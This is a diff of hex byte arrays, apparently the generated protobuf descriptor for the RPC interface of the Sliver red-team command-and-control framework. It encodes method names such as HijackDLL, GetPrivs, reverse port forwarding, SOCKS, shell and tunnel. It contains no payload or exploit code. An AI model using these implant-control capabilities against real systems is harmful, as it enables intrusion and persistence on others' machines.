- 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x45,
- 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x52, 0x65, 0x71, 0x1a, 0x1b, 0x2e, 0x73, 0x6c,
- 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x45,
- 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x44, 0x0a, 0x0d, 0x43, 0x61, 0x6c, 0x6c,
- 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x1a, 0x2e, 0x73, 0x6c, 0x69, 0x76,
- 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x61, 0x6c, 0x6c, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69,
- 0x6f, 0x6e, 0x52, 0x65, 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
- 0x2e, 0x43, 0x61, 0x6c, 0x6c, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x47,
- 0x0a, 0x0e, 0x4c, 0x69, 0x73, 0x74, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x73,
- 0x12, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74,
- 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x18, 0x2e,
- 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x45, 0x78, 0x74,
- 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x12, 0x5c, 0x0a, 0x15, 0x52, 0x65, 0x67, 0x69, 0x73,
- 0x74, 0x65, 0x72, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e,
- 0x12, 0x22, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69,
- 0x73, 0x74, 0x65, 0x72, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f,
- 0x6e, 0x52, 0x65, 0x71, 0x1a, 0x1f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65,
- 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x53, 0x0a, 0x12, 0x4c, 0x69, 0x73, 0x74, 0x57, 0x61, 0x73,
- 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x12, 0x1f, 0x2e, 0x73, 0x6c,
- 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x57, 0x61, 0x73, 0x6d, 0x45,
- 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x1c, 0x2e, 0x73,
- 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x57, 0x61, 0x73, 0x6d,
- 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x12, 0x50, 0x0a, 0x11, 0x45, 0x78,
- 0x65, 0x63, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12,
- 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x57,
- 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x52, 0x65, 0x71, 0x1a,
- 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x57,
- 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x4e, 0x0a, 0x12,
- 0x57, 0x47, 0x53, 0x74, 0x61, 0x72, 0x74, 0x50, 0x6f, 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61,
- 0x72, 0x64, 0x12, 0x1f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47,
- 0x50, 0x6f, 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72, 0x64, 0x53, 0x74, 0x61, 0x72, 0x74,
- 0x52, 0x65, 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57,
- 0x47, 0x50, 0x6f, 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72, 0x64, 0x12, 0x4c, 0x0a, 0x11,
- 0x57, 0x47, 0x53, 0x74, 0x6f, 0x70, 0x50, 0x6f, 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72,
- 0x64, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x50,
- 0x6f, 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72, 0x64, 0x53, 0x74, 0x6f, 0x70, 0x52, 0x65,
- 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x50,
- 0x6f, 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72, 0x64, 0x12, 0x3c, 0x0a, 0x0c, 0x57, 0x47,
- 0x53, 0x74, 0x61, 0x72, 0x74, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12, 0x19, 0x2e, 0x73, 0x6c, 0x69,
- 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x53, 0x74, 0x61,
- 0x72, 0x74, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
- 0x2e, 0x57, 0x47, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12, 0x3a, 0x0a, 0x0b, 0x57, 0x47, 0x53, 0x74,
- 0x6f, 0x70, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12, 0x18, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x57, 0x47, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x53, 0x74, 0x6f, 0x70, 0x52, 0x65,
- 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x53,
- 0x6f, 0x63, 0x6b, 0x73, 0x12, 0x4b, 0x0a, 0x10, 0x57, 0x47, 0x4c, 0x69, 0x73, 0x74, 0x46, 0x6f,
- 0x72, 0x77, 0x61, 0x72, 0x64, 0x65, 0x72, 0x73, 0x12, 0x1c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x54, 0x43, 0x50, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72, 0x64,
- 0x65, 0x72, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x19, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
- 0x62, 0x2e, 0x57, 0x47, 0x54, 0x43, 0x50, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72, 0x64, 0x65, 0x72,
- 0x73, 0x12, 0x4b, 0x0a, 0x12, 0x57, 0x47, 0x4c, 0x69, 0x73, 0x74, 0x53, 0x6f, 0x63, 0x6b, 0x73,
- 0x53, 0x65, 0x72, 0x76, 0x65, 0x72, 0x73, 0x12, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x57, 0x47, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x53, 0x65, 0x72, 0x76, 0x65, 0x72,
+ 0x64, 0x12, 0x38, 0x0a, 0x09, 0x48, 0x69, 0x6a, 0x61, 0x63, 0x6b, 0x44, 0x4c, 0x4c, 0x12, 0x16,
+ 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x44, 0x6c, 0x6c, 0x48, 0x69, 0x6a,
+ 0x61, 0x63, 0x6b, 0x52, 0x65, 0x71, 0x1a, 0x13, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70,
+ 0x62, 0x2e, 0x44, 0x6c, 0x6c, 0x48, 0x69, 0x6a, 0x61, 0x63, 0x6b, 0x12, 0x35, 0x0a, 0x08, 0x47,
+ 0x65, 0x74, 0x50, 0x72, 0x69, 0x76, 0x73, 0x12, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x47, 0x65, 0x74, 0x50, 0x72, 0x69, 0x76, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x12,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x47, 0x65, 0x74, 0x50, 0x72, 0x69,
+ 0x76, 0x73, 0x12, 0x57, 0x0a, 0x15, 0x53, 0x74, 0x61, 0x72, 0x74, 0x52, 0x70, 0x6f, 0x72, 0x74,
+ 0x46, 0x77, 0x64, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x12, 0x22, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x53,
+ 0x74, 0x61, 0x72, 0x74, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x52, 0x65, 0x71, 0x1a,
+ 0x1a, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x70, 0x6f, 0x72, 0x74,
+ 0x46, 0x77, 0x64, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x12, 0x53, 0x0a, 0x14, 0x47,
+ 0x65, 0x74, 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e,
+ 0x65, 0x72, 0x73, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52,
+ 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x73,
+ 0x52, 0x65, 0x71, 0x1a, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52,
+ 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x73,
+ 0x12, 0x55, 0x0a, 0x14, 0x53, 0x74, 0x6f, 0x70, 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64,
+ 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x12, 0x21, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x53, 0x74, 0x6f, 0x70,
+ 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x52, 0x65, 0x71, 0x1a, 0x1a, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x77, 0x64, 0x4c,
+ 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x12, 0x3b, 0x0a, 0x0b, 0x4f, 0x70, 0x65, 0x6e, 0x53,
+ 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x6e, 0x53, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x1a, 0x15, 0x2e,
+ 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x6e, 0x53, 0x65, 0x73,
+ 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x37, 0x0a, 0x0c, 0x43, 0x6c, 0x6f, 0x73, 0x65, 0x53, 0x65, 0x73,
+ 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x16, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
+ 0x43, 0x6c, 0x6f, 0x73, 0x65, 0x53, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x1a, 0x0f, 0x2e, 0x63,
+ 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x12, 0x50, 0x0a,
+ 0x11, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69,
+ 0x6f, 0x6e, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65,
+ 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x52,
+ 0x65, 0x71, 0x1a, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65,
+ 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12,
+ 0x44, 0x0a, 0x0d, 0x43, 0x61, 0x6c, 0x6c, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e,
+ 0x12, 0x1a, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x61, 0x6c, 0x6c,
+ 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x52, 0x65, 0x71, 0x1a, 0x17, 0x2e, 0x73,
+ 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x61, 0x6c, 0x6c, 0x45, 0x78, 0x74, 0x65,
+ 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x47, 0x0a, 0x0e, 0x4c, 0x69, 0x73, 0x74, 0x45, 0x78, 0x74,
+ 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x12, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e,
0x73, 0x52, 0x65, 0x71, 0x1a, 0x18, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x57, 0x47, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x53, 0x65, 0x72, 0x76, 0x65, 0x72, 0x73, 0x12, 0x2c,
- 0x0a, 0x05, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x12, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c,
- 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x12, 0x32, 0x0a, 0x07,
- 0x50, 0x6f, 0x72, 0x74, 0x66, 0x77, 0x64, 0x12, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x50, 0x6f, 0x72, 0x74, 0x66, 0x77, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e,
- 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x6f, 0x72, 0x74, 0x66, 0x77, 0x64,
- 0x12, 0x2f, 0x0a, 0x0b, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12,
- 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x6f, 0x63, 0x6b, 0x73,
- 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x6f, 0x63, 0x6b,
- 0x73, 0x12, 0x2e, 0x0a, 0x0a, 0x43, 0x6c, 0x6f, 0x73, 0x65, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12,
- 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x6f, 0x63, 0x6b, 0x73,
- 0x1a, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74,
- 0x79, 0x12, 0x3a, 0x0a, 0x0a, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x50, 0x72, 0x6f, 0x78, 0x79, 0x12,
- 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x6f, 0x63, 0x6b, 0x73,
- 0x44, 0x61, 0x74, 0x61, 0x1a, 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x44, 0x61, 0x74, 0x61, 0x28, 0x01, 0x30, 0x01, 0x12, 0x32, 0x0a,
- 0x0c, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c, 0x12, 0x10, 0x2e,
- 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c, 0x1a,
- 0x10, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x75, 0x6e, 0x6e, 0x65,
- 0x6c, 0x12, 0x30, 0x0a, 0x0b, 0x43, 0x6c, 0x6f, 0x73, 0x65, 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c,
- 0x12, 0x10, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x75, 0x6e, 0x6e,
- 0x65, 0x6c, 0x1a, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d,
- 0x70, 0x74, 0x79, 0x12, 0x3c, 0x0a, 0x0a, 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c, 0x44, 0x61, 0x74,
- 0x61, 0x12, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x75, 0x6e,
- 0x6e, 0x65, 0x6c, 0x44, 0x61, 0x74, 0x61, 0x1a, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c, 0x44, 0x61, 0x74, 0x61, 0x28, 0x01, 0x30,
- 0x01, 0x12, 0x2c, 0x0a, 0x06, 0x45, 0x76, 0x65, 0x6e, 0x74, 0x73, 0x12, 0x0f, 0x2e, 0x63, 0x6f,
- 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0f, 0x2e, 0x63,
- 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x45, 0x76, 0x65, 0x6e, 0x74, 0x30, 0x01, 0x42,
- 0x2c, 0x5a, 0x2a, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x62, 0x69,
- 0x73, 0x68, 0x6f, 0x70, 0x66, 0x6f, 0x78, 0x2f, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x2f, 0x70,
- 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, 0x72, 0x70, 0x63, 0x70, 0x62, 0x62, 0x06, 0x70,
- 0x72, 0x6f, 0x74, 0x6f, 0x33,
+ 0x4c, 0x69, 0x73, 0x74, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x12, 0x5c,
+ 0x0a, 0x15, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78,
+ 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x22, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x57, 0x61, 0x73, 0x6d, 0x45,
+ 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x52, 0x65, 0x71, 0x1a, 0x1f, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x57,
+ 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x53, 0x0a, 0x12,
+ 0x4c, 0x69, 0x73, 0x74, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f,
+ 0x6e, 0x73, 0x12, 0x1f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c, 0x69,
+ 0x73, 0x74, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x73,
+ 0x52, 0x65, 0x71, 0x1a, 0x1c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c,
+ 0x69, 0x73, 0x74, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e,
+ 0x73, 0x12, 0x50, 0x0a, 0x11, 0x45, 0x78, 0x65, 0x63, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74,
+ 0x65, 0x6e, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73,
+ 0x69, 0x6f, 0x6e, 0x52, 0x65, 0x71, 0x1a, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x57, 0x61, 0x73, 0x6d, 0x45, 0x78, 0x74, 0x65, 0x6e, 0x73,
+ 0x69, 0x6f, 0x6e, 0x12, 0x4e, 0x0a, 0x12, 0x57, 0x47, 0x53, 0x74, 0x61, 0x72, 0x74, 0x50, 0x6f,
+ 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72, 0x64, 0x12, 0x1f, 0x2e, 0x73, 0x6c, 0x69, 0x76,
+ 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x50, 0x6f, 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61,
+ 0x72, 0x64, 0x53, 0x74, 0x61, 0x72, 0x74, 0x52, 0x65, 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x50, 0x6f, 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77,
+ 0x61, 0x72, 0x64, 0x12, 0x4c, 0x0a, 0x11, 0x57, 0x47, 0x53, 0x74, 0x6f, 0x70, 0x50, 0x6f, 0x72,
+ 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72, 0x64, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x50, 0x6f, 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72,
+ 0x64, 0x53, 0x74, 0x6f, 0x70, 0x52, 0x65, 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x50, 0x6f, 0x72, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72,
+ 0x64, 0x12, 0x3c, 0x0a, 0x0c, 0x57, 0x47, 0x53, 0x74, 0x61, 0x72, 0x74, 0x53, 0x6f, 0x63, 0x6b,
+ 0x73, 0x12, 0x19, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x53,
+ 0x6f, 0x63, 0x6b, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73,
+ 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12,
+ 0x3a, 0x0a, 0x0b, 0x57, 0x47, 0x53, 0x74, 0x6f, 0x70, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12, 0x18,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x53, 0x6f, 0x63, 0x6b,
+ 0x73, 0x53, 0x74, 0x6f, 0x70, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12, 0x4b, 0x0a, 0x10, 0x57,
+ 0x47, 0x4c, 0x69, 0x73, 0x74, 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72, 0x64, 0x65, 0x72, 0x73, 0x12,
+ 0x1c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x54, 0x43, 0x50,
+ 0x46, 0x6f, 0x72, 0x77, 0x61, 0x72, 0x64, 0x65, 0x72, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x19, 0x2e,
+ 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x54, 0x43, 0x50, 0x46, 0x6f,
+ 0x72, 0x77, 0x61, 0x72, 0x64, 0x65, 0x72, 0x73, 0x12, 0x4b, 0x0a, 0x12, 0x57, 0x47, 0x4c, 0x69,
+ 0x73, 0x74, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x53, 0x65, 0x72, 0x76, 0x65, 0x72, 0x73, 0x12, 0x1b,
